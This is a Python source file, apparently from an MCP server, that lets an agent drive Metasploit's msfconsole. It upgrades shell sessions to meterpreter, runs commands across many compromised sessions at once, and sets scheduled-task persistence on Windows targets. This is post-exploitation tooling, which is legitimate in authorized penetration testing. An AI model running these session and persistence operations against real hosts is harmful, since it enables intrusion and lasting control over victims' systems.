Skip to main content
Glama

MSFConsole MCP Server

by LYFTIUM-INC
msf_advanced_session_manager.pyโ€ข30.1 kB
""" MSF Advanced Session Manager v5.0 Provides session upgrading, bulk operations, clustering, and persistence """ import asyncio import json import logging from datetime import datetime from typing import Any, Dict, List, Optional, Set, Tuple from dataclasses import dataclass, field from enum import Enum from msf_stable_integration import MSFConsoleStableWrapper, OperationResult from msf_extended_tools import ExtendedOperationResult logger = logging.getLogger(__name__) class SessionType(Enum): """Session types in MSF""" SHELL = "shell" METERPRETER = "meterpreter" POWERSHELL = "powershell" PYTHON = "python" SSH = "ssh" UNKNOWN = "unknown" @dataclass class SessionInfo: """Enhanced session information""" id: str type: SessionType target_host: str info: str tunnel_local: str = "" tunnel_peer: str = "" via_exploit: str = "" via_payload: str = "" created_at: datetime = field(default_factory=datetime.now) last_checkin: datetime = field(default_factory=datetime.now) tags: Set[str] = field(default_factory=set) group: Optional[str] = None health_status: str = "healthy" metadata: Dict[str, Any] = field(default_factory=dict) class MSFAdvancedSessionManager(MSFConsoleStableWrapper): """Advanced session management with upgrading, bulk operations, and persistence""" def __init__(self): super().__init__() self._sessions: Dict[str, SessionInfo] = {} self._session_groups: Dict[str, Set[str]] = {} self._persistence_handlers = {} self._upgrade_queue = asyncio.Queue() self._monitoring = False self._monitor_task = None async def initialize_session_manager(self) -> OperationResult: """Initialize advanced session management""" try: # Start session monitoring self._monitoring = True self._monitor_task = asyncio.create_task(self._monitor_sessions()) # Load persisted session data await self._load_session_data() return OperationResult( success=True, data={"status": "initialized"}, metadata={"session_manager": "v5.0"} ) except Exception as e: logger.error(f"Failed to initialize session manager: {e}") return OperationResult( success=False, data=None, error=str(e) ) # ==================== SESSION UPGRADING ==================== async def msf_session_upgrader( self, session_id: str, target_type: str = "meterpreter", handler_options: Optional[Dict[str, Any]] = None, timeout: int = 300, **kwargs ) -> ExtendedOperationResult: """Upgrade shell sessions to meterpreter or other types""" try: # Validate session exists and type session_info = await self._get_session_info(session_id) if not session_info: return ExtendedOperationResult( success=False, data=None, error=f"Session {session_id} not found" ) if session_info["type"] == target_type: return ExtendedOperationResult( success=True, data={ "session_id": session_id, "message": f"Session already type {target_type}" }, metadata={"action": "session_upgrade"} ) # Use appropriate upgrade method based on current and target type if session_info["type"] == "shell" and target_type == "meterpreter": result = await self._upgrade_shell_to_meterpreter(session_id, handler_options, timeout) elif session_info["type"] == "shell" and target_type == "powershell": result = await self._upgrade_shell_to_powershell(session_id, timeout) else: return ExtendedOperationResult( success=False, data=None, error=f"Upgrade from {session_info['type']} to {target_type} not supported" ) return result except Exception as e: logger.error(f"Session upgrade error: {e}") return ExtendedOperationResult( success=False, data=None, error=str(e) ) async def _upgrade_shell_to_meterpreter( self, session_id: str, handler_options: Optional[Dict[str, Any]], timeout: int ) -> ExtendedOperationResult: """Upgrade shell to meterpreter session""" try: # Method 1: Use sessions -u command upgrade_cmd = f"sessions -u {session_id}" result = await self.execute_command(upgrade_cmd, timeout=timeout) if "Meterpreter session" in result.output: # Extract new session ID import re match = re.search(r'Meterpreter session (\d+) opened', result.output) if match: new_session_id = match.group(1) return ExtendedOperationResult( success=True, data={ "original_session": session_id, "upgraded_session": new_session_id, "type": "meterpreter", "method": "sessions_upgrade" }, output=result.output, metadata={"action": "session_upgrade", "duration": timeout} ) # Method 2: Use post/multi/manage/shell_to_meterpreter if handler_options: lhost = handler_options.get("LHOST", "0.0.0.0") lport = handler_options.get("LPORT", "4444") else: # Get default LHOST lhost = await self._get_default_lhost() lport = "4444" upgrade_module = "post/multi/manage/shell_to_meterpreter" # Configure and run upgrade module commands = [ f"use {upgrade_module}", f"set SESSION {session_id}", f"set LHOST {lhost}", f"set LPORT {lport}", "run" ] for cmd in commands: result = await self.execute_command(cmd) # Wait for upgrade to complete await asyncio.sleep(5) # Check for new meterpreter session sessions_result = await self.execute_command("sessions -l") new_session = self._find_upgraded_session(sessions_result.output, session_id) if new_session: return ExtendedOperationResult( success=True, data={ "original_session": session_id, "upgraded_session": new_session, "type": "meterpreter", "method": "shell_to_meterpreter_module" }, metadata={"action": "session_upgrade", "handler": {"LHOST": lhost, "LPORT": lport}} ) else: return ExtendedOperationResult( success=False, data=None, error="Upgrade failed - no new meterpreter session detected", output=result.output ) except Exception as e: logger.error(f"Shell to meterpreter upgrade error: {e}") return ExtendedOperationResult( success=False, data=None, error=str(e) ) # ==================== BULK SESSION OPERATIONS ==================== async def msf_bulk_session_operations( self, action: str, session_ids: Optional[List[str]] = None, group: Optional[str] = None, command: Optional[str] = None, script: Optional[str] = None, timeout: int = 60, parallel: bool = True, **kwargs ) -> ExtendedOperationResult: """Execute operations on multiple sessions simultaneously""" try: # Determine target sessions target_sessions = [] if session_ids: target_sessions = session_ids elif group and group in self._session_groups: target_sessions = list(self._session_groups[group]) else: # Get all active sessions sessions_result = await self.execute_command("sessions -l") all_sessions = self._parse_session_list(sessions_result.output) target_sessions = list(all_sessions.keys()) if not target_sessions: return ExtendedOperationResult( success=False, data=None, error="No target sessions found" ) # Execute action if action == "execute": results = await self._bulk_execute_command(target_sessions, command, parallel, timeout) elif action == "script": results = await self._bulk_run_script(target_sessions, script, parallel, timeout) elif action == "info": results = await self._bulk_get_info(target_sessions, parallel) elif action == "kill": results = await self._bulk_kill_sessions(target_sessions, parallel) elif action == "migrate": results = await self._bulk_migrate_sessions(target_sessions, parallel, timeout) else: return ExtendedOperationResult( success=False, data=None, error=f"Unknown bulk action: {action}" ) # Aggregate results successful = sum(1 for r in results.values() if r.get("success", False)) failed = len(results) - successful return ExtendedOperationResult( success=failed == 0, data={ "action": action, "total_sessions": len(target_sessions), "successful": successful, "failed": failed, "results": results }, metadata={ "bulk_operation": True, "parallel": parallel, "timeout": timeout }, extended_data={ "target_sessions": target_sessions, "execution_time": datetime.now().isoformat() } ) except Exception as e: logger.error(f"Bulk session operation error: {e}") return ExtendedOperationResult( success=False, data=None, error=str(e) ) async def _bulk_execute_command( self, sessions: List[str], command: str, parallel: bool, timeout: int ) -> Dict[str, Dict[str, Any]]: """Execute command on multiple sessions""" results = {} if parallel: # Parallel execution tasks = [] for session_id in sessions: task = self._execute_on_session(session_id, command, timeout) tasks.append((session_id, task)) for session_id, task in tasks: try: result = await task results[session_id] = { "success": result.success, "output": result.output, "error": result.error } except Exception as e: results[session_id] = { "success": False, "error": str(e) } else: # Sequential execution for session_id in sessions: try: result = await self._execute_on_session(session_id, command, timeout) results[session_id] = { "success": result.success, "output": result.output, "error": result.error } except Exception as e: results[session_id] = { "success": False, "error": str(e) } return results # ==================== SESSION CLUSTERING ==================== async def msf_session_clustering( self, action: str, group_name: Optional[str] = None, session_ids: Optional[List[str]] = None, criteria: Optional[Dict[str, Any]] = None, **kwargs ) -> ExtendedOperationResult: """Group and manage sessions in clusters""" try: if action == "create": # Create session group if not group_name: return ExtendedOperationResult( success=False, data=None, error="Group name required" ) if session_ids: # Manual grouping self._session_groups[group_name] = set(session_ids) elif criteria: # Auto-grouping based on criteria matching_sessions = await self._find_sessions_by_criteria(criteria) self._session_groups[group_name] = set(matching_sessions) else: self._session_groups[group_name] = set() return ExtendedOperationResult( success=True, data={ "group": group_name, "sessions": list(self._session_groups[group_name]), "count": len(self._session_groups[group_name]) }, metadata={"action": "create_group"} ) elif action == "add": # Add sessions to group if not group_name or not session_ids: return ExtendedOperationResult( success=False, data=None, error="Group name and session_ids required" ) if group_name not in self._session_groups: self._session_groups[group_name] = set() self._session_groups[group_name].update(session_ids) return ExtendedOperationResult( success=True, data={ "group": group_name, "added": session_ids, "total_sessions": len(self._session_groups[group_name]) }, metadata={"action": "add_to_group"} ) elif action == "remove": # Remove sessions from group if not group_name or not session_ids: return ExtendedOperationResult( success=False, data=None, error="Group name and session_ids required" ) if group_name in self._session_groups: for sid in session_ids: self._session_groups[group_name].discard(sid) return ExtendedOperationResult( success=True, data={ "group": group_name, "removed": session_ids, "remaining_sessions": len(self._session_groups.get(group_name, set())) }, metadata={"action": "remove_from_group"} ) elif action == "list": # List groups groups_info = [] for group_name, sessions in self._session_groups.items(): groups_info.append({ "name": group_name, "sessions": list(sessions), "count": len(sessions) }) return ExtendedOperationResult( success=True, data={"groups": groups_info}, metadata={"action": "list_groups", "total_groups": len(groups_info)} ) elif action == "delete": # Delete group if not group_name: return ExtendedOperationResult( success=False, data=None, error="Group name required" ) deleted = self._session_groups.pop(group_name, None) return ExtendedOperationResult( success=deleted is not None, data={ "group": group_name, "deleted": deleted is not None }, metadata={"action": "delete_group"} ) else: return ExtendedOperationResult( success=False, data=None, error=f"Unknown clustering action: {action}" ) except Exception as e: logger.error(f"Session clustering error: {e}") return ExtendedOperationResult( success=False, data=None, error=str(e) ) # ==================== SESSION PERSISTENCE ==================== async def msf_session_persistence( self, action: str, session_id: Optional[str] = None, method: str = "scheduled_task", options: Optional[Dict[str, Any]] = None, **kwargs ) -> ExtendedOperationResult: """Implement session persistence mechanisms""" try: if action == "enable": # Enable persistence for session if not session_id: return ExtendedOperationResult( success=False, data=None, error="Session ID required" ) # Check session type session_info = await self._get_session_info(session_id) if not session_info or session_info["type"] != "meterpreter": return ExtendedOperationResult( success=False, data=None, error="Persistence requires meterpreter session" ) # Apply persistence based on method if method == "scheduled_task": result = await self._apply_scheduled_task_persistence(session_id, options) elif method == "registry": result = await self._apply_registry_persistence(session_id, options) elif method == "service": result = await self._apply_service_persistence(session_id, options) else: return ExtendedOperationResult( success=False, data=None, error=f"Unknown persistence method: {method}" ) if result["success"]: self._persistence_handlers[session_id] = { "method": method, "options": options, "enabled_at": datetime.now().isoformat() } return ExtendedOperationResult( success=result["success"], data=result, metadata={"action": "enable_persistence", "method": method} ) elif action == "disable": # Disable persistence if not session_id: return ExtendedOperationResult( success=False, data=None, error="Session ID required" ) if session_id not in self._persistence_handlers: return ExtendedOperationResult( success=True, data={"message": "No persistence enabled for session"}, metadata={"action": "disable_persistence"} ) handler = self._persistence_handlers[session_id] result = await self._remove_persistence(session_id, handler["method"], handler["options"]) if result["success"]: del self._persistence_handlers[session_id] return ExtendedOperationResult( success=result["success"], data=result, metadata={"action": "disable_persistence"} ) elif action == "list": # List persistence handlers handlers_info = [] for sid, handler in self._persistence_handlers.items(): handlers_info.append({ "session_id": sid, "method": handler["method"], "enabled_at": handler["enabled_at"] }) return ExtendedOperationResult( success=True, data={"persistence_handlers": handlers_info}, metadata={"action": "list_persistence", "count": len(handlers_info)} ) else: return ExtendedOperationResult( success=False, data=None, error=f"Unknown persistence action: {action}" ) except Exception as e: logger.error(f"Session persistence error: {e}") return ExtendedOperationResult( success=False, data=None, error=str(e) ) async def _apply_scheduled_task_persistence( self, session_id: str, options: Optional[Dict[str, Any]] ) -> Dict[str, Any]: """Apply scheduled task persistence""" try: # Use persistence module persistence_module = "exploit/windows/local/persistence" commands = [ f"use {persistence_module}", f"set SESSION {session_id}", f"set TECHNIQUE SCHTASKS", "run" ] if options: if "STARTUP_NAME" in options: commands.insert(-1, f"set STARTUP_NAME {options['STARTUP_NAME']}") if "DELAY" in options: commands.insert(-1, f"set DELAY {options['DELAY']}") for cmd in commands: result = await self.execute_command(cmd) return { "success": "Persistence added" in result.output, "method": "scheduled_task", "output": result.output } except Exception as e: return {"success": False, "error": str(e)} # ==================== HELPER METHODS ==================== async def _monitor_sessions(self) -> None: """Monitor sessions for health and events""" while self._monitoring: try: # Get current sessions result = await self.execute_command("sessions -l") current_sessions = self._parse_session_list(result.output) # Update session info for session_id, info in current_sessions.items(): if session_id not in self._sessions: # New session self._sessions[session_id] = SessionInfo( id=session_id, type=SessionType(info.get("type", "unknown")), target_host=info.get("target_host", ""), info=info.get("info", "") ) else: # Update existing session self._sessions[session_id].last_checkin = datetime.now() # Check for dead sessions for session_id in list(self._sessions.keys()): if session_id not in current_sessions: # Session closed del self._sessions[session_id] # Remove from groups for group in self._session_groups.values(): group.discard(session_id) except Exception as e: logger.error(f"Session monitoring error: {e}") await asyncio.sleep(10) # Check every 10 seconds async def _get_session_info(self, session_id: str) -> Optional[Dict[str, Any]]: """Get detailed session information""" result = await self.execute_command(f"sessions -i {session_id} -c 'sysinfo'") if "Unknown session ID" in result.output: return None # Parse session info info = {"id": session_id} # Extract session type if "meterpreter" in result.output.lower(): info["type"] = "meterpreter" elif "shell" in result.output.lower(): info["type"] = "shell" else: info["type"] = "unknown" return info def _parse_session_list(self, output: str) -> Dict[str, Dict[str, Any]]: """Parse session list from MSF output""" sessions = {} lines = output.strip().split('\n') for line in lines: if 'Active sessions' in line or '===' in line or not line.strip(): continue parts = line.split() if len(parts) >= 4 and parts[0].isdigit(): session_id = parts[0] sessions[session_id] = { "type": parts[1], "info": ' '.join(parts[2:]), "target_host": parts[3] if len(parts) > 3 else "" } return sessions async def _execute_on_session(self, session_id: str, command: str, timeout: int) -> OperationResult: """Execute command on specific session""" cmd = f"sessions -c '{command}' -i {session_id}" return await self.execute_command(cmd, timeout=timeout) async def _get_default_lhost(self) -> str: """Get default LHOST for handlers""" result = await self.execute_command("get LHOST") if result.success and result.output: for line in result.output.split('\n'): if "LHOST" in line and "=>" in line: return line.split("=>")[1].strip() return "0.0.0.0" def _find_upgraded_session(self, sessions_output: str, original_id: str) -> Optional[str]: """Find upgraded session ID""" sessions = self._parse_session_list(sessions_output) # Look for new meterpreter session for sid, info in sessions.items(): if sid != original_id and info["type"] == "meterpreter": return sid return None async def _find_sessions_by_criteria(self, criteria: Dict[str, Any]) -> List[str]: """Find sessions matching criteria""" matching = [] sessions = self._parse_session_list((await self.execute_command("sessions -l")).output) for sid, info in sessions.items(): match = True if "type" in criteria and info["type"] != criteria["type"]: match = False if "target_host" in criteria and criteria["target_host"] not in info.get("target_host", ""): match = False if match: matching.append(sid) return matching async def _load_session_data(self) -> None: """Load persisted session data""" # Implementation for loading persisted session data pass async def _save_session_data(self) -> None: """Save session data for persistence""" # Implementation for saving session data pass

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/LYFTIUM-INC/msfconsole-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server